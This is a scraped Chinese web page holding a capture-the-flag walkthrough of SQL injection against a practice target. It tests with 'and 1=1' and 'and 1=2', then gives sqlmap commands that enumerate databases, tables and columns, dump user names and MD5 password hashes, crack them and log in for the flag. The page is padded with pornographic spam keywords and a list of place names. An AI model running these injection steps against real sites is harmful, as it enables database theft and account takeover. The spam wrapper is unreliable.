婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > sqlmap注入圖文詳解

sqlmap注入圖文詳解

熱門標(biāo)簽:大眾點(diǎn)評星級酒店地圖標(biāo)注 云南電商智能外呼系統(tǒng)價格 拉卡拉外呼系統(tǒng) 高清地圖標(biāo)注道路 臨清電話機(jī)器人 智能外呼系統(tǒng)復(fù)位 話務(wù)外呼系統(tǒng)怎么樣 外東北地圖標(biāo)注 400電話可以辦理嗎

1.發(fā)現(xiàn)此網(wǎng)址可能存在sql注入漏洞,我們進(jìn)行sql盲注入測試一下是否存在漏洞。

地址欄輸入 and 1=1 發(fā)現(xiàn)頁面正常顯示。


再次輸入and 1=2 頁面出現(xiàn)錯誤,說明該頁面可能存在sql注入漏洞


2.現(xiàn)在拿出我們的kali工具,sqlmap進(jìn)行注入測試。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs


3.可以看到存在注入漏洞,掃到了5個數(shù)據(jù)庫。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個數(shù)據(jù)庫存在的表單

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables


4.接下來查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns


5.上一步可以看到,name,password 是不是很熟悉。ok接下來我們開始獲取這兩列的數(shù)據(jù)。


6.可以看到password是經(jīng)過md5加密,接下來我們把他解密。這里推薦給大家我自己收集的多種解密網(wǎng)址:解密網(wǎng)址大全點(diǎn)擊這里


7.now! 密碼已經(jīng)呈現(xiàn)在我們眼前!!!!找到后臺地址進(jìn)行登錄。


8.END 登錄成功,拿到flag,提交。Gameover !

總結(jié)

本篇文章就到這里了,希望能給你帶來幫助,也希望您能夠多多關(guān)注腳本之家的更多內(nèi)容!

您可能感興趣的文章:
  • MyBatis 中 SqlMapConfig 配置文件詳解
  • Windows下Sqlmap環(huán)境安裝教程詳解
  • MyBatis直接執(zhí)行SQL的工具SqlMapper
  • Mybatis中SqlMapper配置的擴(kuò)展與應(yīng)用詳細(xì)介紹(1)
  • 使用XSD校驗Mybatis的SqlMapper配置文件的方法(2)

標(biāo)簽:阿里 福州 溫州 三明 定西 揚(yáng)州 無錫 山西

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《sqlmap注入圖文詳解》,本文關(guān)鍵詞  sqlmap,注入,圖文,詳解,sqlmap,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《sqlmap注入圖文詳解》相關(guān)的同類信息!
  • 本頁收集關(guān)于sqlmap注入圖文詳解的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    主站蜘蛛池模板: 昌宁县| 翼城县| 芜湖县| 永泰县| 临沧市| 玉环县| 龙海市| 柳河县| 洪泽县| 苏尼特左旗| 噶尔县| 通渭县| 衢州市| 新邵县| 碌曲县| 天门市| 黔南| 元阳县| 伊金霍洛旗| 高州市| 古蔺县| 开江县| 临沧市| 巴南区| 乐平市| 综艺| 宣化县| 阿合奇县| 广州市| 儋州市| 安龙县| 恭城| 麻栗坡县| 如皋市| 黄梅县| 攀枝花市| 吴忠市| 红安县| 尖扎县| 平塘县| 平昌县|